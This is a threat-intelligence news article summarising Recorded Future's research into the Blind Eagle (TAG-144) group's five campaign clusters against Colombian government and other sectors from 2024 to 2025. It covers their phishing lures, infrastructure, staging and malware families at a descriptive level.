Blind Eagle’s Expanding Cyber Campaigns: Five Clusters Targeting Colombia’s Government and Beyond
Researchers at Recorded Future’s Insikt Group documented five distinct clusters of activity attributed to the persistent threat actor Blind Eagle (also tracked as TAG-144) between May 2024 and July 2025. The primary focus of these operations was Colombia’s government sector at the local, municipal, and federal levels, though other industries were also affected, and the group’s reach occasionally extended beyond national borders.
The adversary’s profile emerges through recurring tactics implemented with varied execution. Across all clusters, common techniques appear: reliance on open-source or cracked remote access trojans (RATs), use of dynamic domain providers, and abuse of legitimate internet services (LIS) for staging payloads. Yet, infrastructure, delivery mechanisms, and operational nuances differ markedly from one campaign to another, complicating straightforward signature-based correlation.
Blind Eagle has been active since at least 2018, pursuing a hybrid of motives — blending classic cyberespionage with financially driven objectives. Recent operations revealed the use of banking keyloggers and browser monitoring alongside targeted intrusions into government agencies deploying various RATs. Victims included not only executive authorities but also the judiciary, tax offices, finance, oil and gas, energy, education, healthcare, manufacturing, and professional services. While Colombia remained the central battleground, incidents were also recorded in Ecuador, Chile, and Panama, as well as among Spanish-speaking users in North America.
Infection chains typically began with spear-phishing emails purporting to originate from local government agencies. These lures prompted recipients to open malicious documents or click shortened URLs delivered via services such as cort[.]as, acortaurl[.]com, and gtly[.]to. To bolster credibility, attackers often used compromised email accounts belonging to legitimate institutions. Geofiltering was also employed: attempts to access malicious infrastructure from outside Colombia or Ecuador were redirected to official government websites, masking the true nature of the servers during external scrutiny.
TAG-144’s command-and-control (C2) servers frequently leveraged IP addresses from Colombian telecom providers, alongside VPS infrastructure hosted by providers such as Proton666, and VPN services including Powerhouse Management, FrootVPN, and TorGuard. Dynamic DNS platforms — duckdns[.]org, ip-ddns[.]com, and noip[.]com — added further obfuscation, allowing rapid domain rotation and fragmentation of forensic traces.
For staging payloads, attackers leaned heavily on legitimate services like Bitbucket, Discord, Dropbox, GitHub, Google Drive, Internet Archive, lovestoblog[.]com, Paste.ee, Tagbox, and smaller Brazilian image-hosting platforms. This strategy minimized reputational red flags and eased passage through corporate defenses.
Two delivery chains were especially characteristic. In the first, a Visual Basic Script (VBS) attachment served as the dropper, dynamically generating and executing PowerShell scripts that fetched injector modules. These then deployed RATs such as Lime RAT, DCRat, AsyncRAT, or Remcos RAT. In the second, a phishing attachment in SVG format retrieved JavaScript from Discord’s CDN, which in turn pulled a PowerShell script from Paste.ee. That script decoded another PowerShell stage, which downloaded a JPEG from Internet Archive and extracted an embedded .NET assembly. This use of steganography concealed the core binary from security systems monitoring attachments.
Recorded Future analysts mapped five distinct clusters:
- Cluster 1 (Feb–Jul 2025): exclusively targeted Colombian government entities, leveraging DCRat, AsyncRAT, and Remcos RAT.
- Cluster 2 (Sep–Dec 2024): broadened scope to include education, defense, and retail; employed AsyncRAT and XWorm.
- Cluster 3 (Sep 2024–Jul 2025): characterized by consistent deployment of AsyncRAT and Remcos RAT in tandem.
- Cluster 4 (May 2024–Feb 2025): linked to phishing and malicious infrastructure imitating Banco Davivienda, Bancolombia, and BBVA.
- Cluster 5 (Mar–Jul 2025): associated with Lime RAT and a modified AsyncRAT build, overlapping with activity in Clusters 1 and 2.
Of note, the cracked AsyncRAT variant used by Blind Eagle was previously observed in incidents attributed to Red Akodon and Shadow Vector, both of which also targeted Colombian organizations. This highlights the presence of a shared underground marketplace for illicit builds and complicates attribution based solely on binary artifacts.
Statistics across the observation period are striking: nearly 60% of incidents targeted the government sector, followed by education, healthcare, retail, transportation, defense, and the oil industry. Despite occasional forays into neighboring countries and among Spanish-speaking communities in the United States, Colombia — particularly its state institutions — remains the group’s clear priority.
Recorded Future’s conclusion is pragmatic: Blind Eagle illustrates how well-rehearsed, fundamentally unoriginal techniques can still yield high rates of infection in the region. At the same time, the group’s persistence in targeting specific sectors raises questions about ultimate intent: are they merely monetizing stolen data and access using familiar tools and schemes, or do certain operations pursue intelligence-gathering objectives suggestive of state sponsorship? Both interpretations remain plausible and consistent with the observed tactics and victimology.
